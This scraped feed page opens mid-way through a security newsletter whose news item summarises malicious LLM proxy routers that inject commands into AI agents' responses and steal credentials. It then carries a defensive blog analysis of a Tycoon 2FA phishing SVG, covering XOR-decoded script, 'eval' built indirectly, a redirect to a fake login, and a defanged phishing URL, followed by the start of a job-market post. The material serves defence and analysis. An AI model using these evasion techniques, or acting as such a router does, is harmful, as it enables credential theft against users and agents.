8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI123/&quot;&gt;Sponsored: Corelight Agentic Triage helps defenders stay ahead&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 16:19 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Corelight Agentic Triage helps defenders stay ahead&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> </figure><h2 id="shorts">Shorts</h2><h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> discuss how the rise of AI, which is very good at vulnerability and exploit development, will change the cyber security industry and competition between states.</em></p><figure class="kg-card kg-embed-card"> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN162.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN162/&quot;&gt;Between Two Nerds: How AI will upset state cyber competition&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 29:52 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: How AI will upset state cyber competition&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> </figure><p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/lJ13y4xId6c?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: How AI will upset state cyber competition"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>Malicious LLM proxy routers found in the wild:</strong> A recently published academic paper has studied the emerging ecosystem of LLM routers, a type of proxy that sits between AI agents and the AI provider to help with load-balancing and cost tracking and limiting.</p><p>The research team tested 28 paid routers available on marketplaces like Taobao, Xianyu, and on Shopify-hosted storefronts, as well as 400 free routers available on GitHub and other places.</p><p>The <a href="https://arxiv.org/abs/2604.08407"><u>study</u></a> searched for multiple suspicious behaviors, such as modifying the response to inject commands, using a delay/trigger mechanism to hide future bad commands behind a history of clean operations, accessing credentials that pass through them, and using evasion techniques to thwart analysts.</p><p>[<a href="https://news.risky.biz/risky-bulletin-malicious-llm-proxy-routers-found-in-the-wild/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>France takes first steps to ditch Windows for Linux: </strong>The French government is taking its first major steps to ditch Windows for Linux and reduce its dependency on US tech for local European alternatives.</p><p>The first department to bite the bullet will be the French Inter-Ministerial Directorate of Digital Affairs (DINUM). The agency is the unofficial IT department for the French government, and this is very likely a test of how a migration could happen at a larger scale.</p><p>The decision was <a href="https://www.numerique.gouv.fr/sinformer/espace-presse/souverainete-numerique-reduction-dependances-extra-europeennes/"><u>announced</u></a> last week at a seminar between several French government ministries, which also pledged to prepare plans for their own migrations and the alternatives they might need.</p><p>[<a href="https://news.risky.biz/risky-bulletin-france-takes-first-steps-to-ditch-windows-for-linux/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>China&apos;s cybersecurity strategy:</strong> The Natto Thoughts team has published an <a href="https://www.nattothoughts.com/p/cybersecurity-strategy-in-chinas"><u>analysis</u></a> of China&apos;s cybersecurity strategy included in the country&apos;s latest five-year plan released earlier this year.</p><blockquote>Accelerating the construction of a &quot;cyber superpower&quot; (&#x7F51;&#x7EDC;&#x5F3A;&#x56FD;, transliterated w&#x1CE;nglu&#xF2; qi&#xE1;nggu&#xF3;) is one of five superpower-building areas highlighted in Part II of the 15th FYP. The other four areas mentioned are: manufacturing superpower, quality superpower, aerospace superpower, and transportation superpower.</blockquote><h1 id></h1>
  114. Tycoon 2FA and a Sneaky SVG

    Thu, 25 Sep 2025 00:00:00 -0000

    Last week a personal connection reached out about a big wave of scammy invoice emails to their organization, so I thought I would do a quick 101 on what these typically are, how they occur, and what you can do about them. It was actually a good reminder. I think sometimes this sort of thing will not get much deep-dive attention because it’s not considered very sophisticated or “cool” for a certain pedigree of cyber. We don’t really consider that it’s underserved, understaffed and underfunded organizations that tend to see this sort of thing the most - which is why they get hit with ransomware (which is where these usually lead to).
    <p>Last week a personal connection reached out about a big wave of scammy invoice emails to their organization, so I thought I would do a quick 101 on what these typically are, how they occur, and what you can do about them. It was actually a good reminder. I think sometimes this sort of thing will not get much deep-dive attention because it’s not considered very sophisticated or “cool” for a certain pedigree of cyber. We don’t really consider that it’s underserved, understaffed and underfunded organizations that tend to see this sort of thing the most - which is why they get hit with ransomware (which is where these usually lead to).</p> <p>I hope this also serves as a quick how-to on how these work. Frankly, to me this sort of technique feels like some unnecessary extra hoops just to convince someone a fake login page is legit, but - if it works, it works. One extra detail that was mildly interesting to me was the fact that all recipients within the organization received this phishing email from “themselves”, as in the “To:” and “From” fields were the same address, so I’ll outline a few ways in which that is possible and what we can do about that.</p> <p><strong>So here’s the TL;DR:</strong> Tycoon is a <a href="https://blog.sekoia.io/tycoon-2fa-an-in-depth-analysis-of-the-latest-version-of-the-aitm-phishing-kit/?utm_source=chatgpt.com">phishing-as-a-service (PhaaS) kit</a> that performs adversary-in-the-middle (AiTM) attacks to intercept credentials and MFA codes and proxy sessions. The kit is widely used in <a href="https://spycloud.com/blog/an-analysis-of-credentials-phished-by-tycoon-2fa/?utm_source=chatgpt.com">large-scale credential theft campaigns</a> and is often a tool of choice for initial access brokers who then resell access to ransomware groups. The delivery method I cover here hides obfuscated JavaScript inside SVG assets; the SVG decodes and executes a payload that redirects victims to an attacker-controlled page while embedding a base64 token tied to the target, which serves as a way to preload the target’s address into the login screen to lend legitimacy to the page. This can be stopped in O365 environments by <a href="https://learn.microsoft.com/en-us/answers/questions/5516034/disabling-direct-send-in-exchange-online">disabling Direct Send</a> and enforcing SPF/DKIM/DMARC.</p> <p><strong>To Start: What is Tycoon and what is it used for?</strong></p> <p>Tycoon 2FA is a commercial phishing kit that implements adversary-in-the-middle tactics to capture credentials and MFA tokens in real time. It is sold or distributed through PhaaS channels and has been observed targeting major providers such as Microsoft 365 and Gmail with highly convincing login pages, CAPTCHA gating and other stealth features. The kit’s purpose is to harvest valid credentials and session tokens and to enable attackers - whether the kit operator or their customers - to take over accounts, access email, and pivot into environments. Recent vendor reports and telemetry show Tycoon actively evolving with new templates and delivery techniques.</p> <p>Tycoon is a full PhaaS ecosystem: operators sell subscriptions and templates (often via Telegram), provide a user-friendly control panel and relay/proxy infrastructure that performs real-time session interception, and bake in anti-analysis features such as CAPTCHA gating, link obfuscation and dynamic templates to evade automated scraping and blocking. <a href="https://www.proofpoint.com/us/blog/email-and-cloud-threats/tycoon-2fa-phishing-kit-mfa-bypass?utm_source=chatgpt.com">Researchers consistently observe Tycoon collecting credentials, but also session cookies, browser fingerprints, IP/geolocation and other metadata</a> so operators can validate access and prioritize high-value accounts; that data profile is what makes the crop attractive to initial-access brokers who verify, enrich, and then resell access to ransomware affiliates. Vendor telemetry also shows the kit <a href="https://blog.barracuda.com/2025/01/22/threat-spotlight-tycoon-2fa-phishing-kit?utm_source=chatgpt.com">evolving rapidly, like new obfuscation tricks, hosting/playbook changes, and delivery techniques.</a></p> <p><strong>General Threat intelligence: Tycoon, Initial Access Brokers, and ransomware resale</strong></p> <p>Tycoon and similar AiTM phishing kits are popular with both hands-on operators and initial access brokers (IABs). IABs monetize access by harvesting credentials, validating access, and then selling verified or privileged access to other criminals, frequently <a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/phaas-the-secrets-the-hidden-ties-between-tycoon2fa-and-dadsecs-operations/">ransomware affiliates or Ransomware-as-a-Service operators</a>. The economics are pretty straightforward: a PhaaS kit such as Tycoon lowers the cost and barrier to entry for credential theft, generating large credential pools that can be verified and resold. Recent telemetry shows Tycoon campaigns capturing <a href="https://annoyed.engineer/2025/06/04/tycoon-2fa-how-storm-1747-built-an-mfa-bypassing-phishing-empire/">hundreds of thousands of credentials</a> in short time windows and a steady pipeline from phishing harvest to resale and eventual ransomware and extortion operations.</p> <p><strong>A deep dive: what did I actually look at (deobfuscated, defanged)</strong></p> <p>I was given a pretty basic and low-effort “Payment Receipt for [Organization]” email lure that included an .SVG attachment. The Recipient and Sender address were identical, as if the recipient sent themselves the message. There was no email text body, just the attachment.</p> <p><img width="874" height="193" alt="Screenshot 2025-09-25 154125" src="https://github.com/user-attachments/assets/aa605d18-1d08-4d3e-a0d0-2152a95ef791" /></p> <p><br /></p> <p>One earlier indicator of Tycoon usage is that the OrgName matches the organization’s O365 subdomain name, which isn’t a perfect human-friendly representation for a lure (think “Payment Receipt for redcross” rather than Pay Receipt for the Red Cross”). So - first things first, I start taking apart the SVG attachment.</p> <p><br /></p> <p><img width="975" height="500" alt="image" src="https://github.com/user-attachments/assets/212e68fd-5df3-4c0c-9f5b-713769a461be" /></p> <p><em>Editorial Note: I manually edited one Base64 encoded value in this example to redact the email address of the person that shared this with me. This will make sense in a moment.</em></p> <p>The file contains an inline &lt;script&gt; that hides a small, concise runtime loader. The loader’s goal is simple and malicious: produce a redirect to an attacker-controlled URL while tagging the redirect with a base64 token that identifies the victim or campaign, and in this case prefills the login portal. The core steps are:</p> <ul> <li>The script stores a base64-like token (prefixed with $) that decodes to an email address. In this sample the token decodes to the targeted user’s email address.</li> <li>A long hex string is XOR-decoded with a short ASCII key into a JavaScript snippet that’s assembled at runtime.</li> <li>The snippet builds the string “eval” dynamically (using that tiny little lookup table up there) and then calls the decoded code via an indirect global eval trick, which runs the redirect payload.</li> </ul> <p><img width="975" height="504" alt="image" src="https://github.com/user-attachments/assets/c93e643a-bf7d-42a0-9485-06231164ab76" /></p> <ul> <li>The redirect payload base64-decodes a URL and appends the token, causing the victim’s browser to navigate to an attacker domain with the victim identifier attached.</li> </ul> <p><img width="975" height="620" alt="image" src="https://github.com/user-attachments/assets/c4cfdd16-3b24-40c2-b1fd-32d37adaa572" /></p> <ul> <li>End-state is a fake O365 login portal to steal credentials, with the targeted user’s email address pre-loaded.</li> </ul> <p><strong>Defanged artifacts from the sample</strong></p> <ul> <li>Defanged destination: hxxps[:]//fable-5ttuenigma[.]qgwum[.]ru/kYWR!C5W/</li> <li>Defanged appended token (base64 - this is made up by me): $Ym9iam9obnNvbkBiaWdjb21wYW55Lm9yZw== → decoded: bobjohnson@bigcompany[.]org</li> </ul> <p><br /></p> <p><strong>Why the Obfuscation?</strong></p> <p>Building ‘eval’ indirectly (e.g., n(‘e’)+n(‘v’)+n(‘a’)+n(‘l’)) and XORing a hex blob at runtime are cheap but effective evasion techniques. They hide both suspicious keywords and the payload from naive static scanners and slow manual analysis. Because the payload is embedded in an SVG, it can be hosted as a seemingly benign static asset on compromised sites or within theme/templates and delivered to many targets. This means it can be moved around without anything picking up that it is malicious, which also means you can send it in an email without many things picking up that it is malicious.</p> <p>Plus, you can swap out little bits and bobs in the script to change the file hash. I would imagine this has less than 24 hours before it’s in <a href="https://www.virustotal.com/">VirusTotal</a> or various other solutions so the idea is you just send a blast and then swap out a value in the lookup table or something to change the file’s signature.</p> <p><strong>Why the email sometimes shows the same address in TO and FROM (Direct Send / spoofing)</strong></p> <p>A common triage question is: how can a phishing email appear to come from the same address that received it? Two mechanisms often explain this:</p> <ul> <li><strong>Header spoofing combined with lax acceptance rules.</strong> An attacker can craft an SMTP message where the From: header matches the To: header. <a href="https://learn.microsoft.com/en-us/defender-office-365/anti-phishing-protection-spoofing-about">If the recipient MX accepts that message and the tenant does not enforce strict inbound authentication checks</a>, the message may look “internal.”</li> <li><strong>Abuse of Direct Send (Microsoft 365 example and more likely here).</strong> Direct Send allows devices and services to deliver mail <a href="https://www.bleepingcomputer.com/news/security/microsoft-365-direct-send-abused-to-send-phishing-as-internal-users/">directly to Microsoft 365 mailboxes</a> using the tenant MX without authenticating, under certain configurations. Attackers abuse or mimic these delivery paths so that downstream checks treat the message as having traversed trusted infrastructure, reducing some anti-spoof signals. That’s why disabling or tightening Direct Send and enforcing authenticated submission are important mitigations. Microsoft and vendors have published guidance and tenant controls that reduce this abuse.</li> </ul> <p><strong>Practical detection, mitigation and an IR playbook</strong></p> <p><strong>Immediate mitigation:</strong></p> <ul> <li><strong>Defang &amp; block the domain(s)</strong> observed in the artifact (e.g., add to DNS/proxy blocklist). Use defanged IOCs in comms: hxxps[:]//fable-5ttuenigma[.]qgwum[.]ru. We always say this but honestly the URL is probably dead within the next week or so.</li> <li><strong>Disable or restrict Direct Send</strong> and require authenticated SMTP submission for devices and apps; where Direct Send is necessary, inventory and restrict its use. For Exchange Online/Exchange Admins, review tenant settings and connectors and <a href="https://www.varonis.com/blog/direct-send-exploit">consider rejecting unauthenticated Direct Send.</a></li> <li><strong>Enforce SPF/DKIM/DMARC</strong> and move DMARC to p=quarantine/p=reject after monitoring. <a href="https://learn.microsoft.com/en-us/defender-office-365/email-authentication-dmarc-configure">This reduces success of external spoofing.</a></li> </ul> <p><br /> <br /></p> <p><strong>Conclusion</strong></p> <p>This sort of thing I generally wouldn’t come across but was a handy exercise that hopefully helps someone receiving these that otherwise wouldn’t have the resources to address it. You can largely prevent delivery of these by disabling Direct Send and enforcing SPF/DKIM/DMARC, which is a pretty low-impact way of just forgetting these ever existed. Hope it helps!</p> <p><img src="http://canarytokens.com/terms/about/7tqxtf11dktrrctw6ixsbzt9r/index.html" style="display: none;" /></p>
  115. The Cyber Job Market: 2025

    Mon, 01 Sep 2025 00:00:00 -0000

    I had planned to write this up since the start of the job search, since it has always felt labor solidarity focused when others have done it, so here’s my contribution. Even outside of that, the most common conversation I’ve had with colleagues past and present over the last few months has been about the state of the job market in cybersecurity. It comes up constantly, especially with other federal employees who are similarly weighing their options and thinking about making a move. The uncertainty, the volume of applications, and the lack of feedback are nearly universal themes.
    <p>I had planned to write this up since the start of the job search, since it has always felt labor solidarity focused when others have done it, so here’s my contribution. Even outside of that, the most common conversation I’ve had with colleagues past and present over the last few months has been about the state of the job market in cybersecurity. It comes up constantly, especially with other federal employees who are similarly weighing their options and thinking about making a move. The uncertainty, the volume of applications, and the lack of feedback are nearly universal themes.</p> <p>Because of that, I decided to write this post. Over the past six months, I tracked my own job search in detail: every application, every rejection, every interview. From mid-January when I started applying in earnest, to late July, when I finally received an offer, I submitted 339 applications. What happened to all of them tells a story not just about my own search, but about the hiring landscape that so many of us are facing right now. This post is specifically geared towards folks working in cyber, located in the United States, and particularly cyber professionals working in or in support of the federal government as a means of contextualizing the cyber job market in 2025 and what you might be experiencing yourself, or what you have to look forward to.</p> <p><br /></p> <h2 id="background">Background</h2> <p>I left the federal government earlier this year after five years at DHS and a prior 10 years of mixed federal service and contracting within DoD. My first applications were sent January 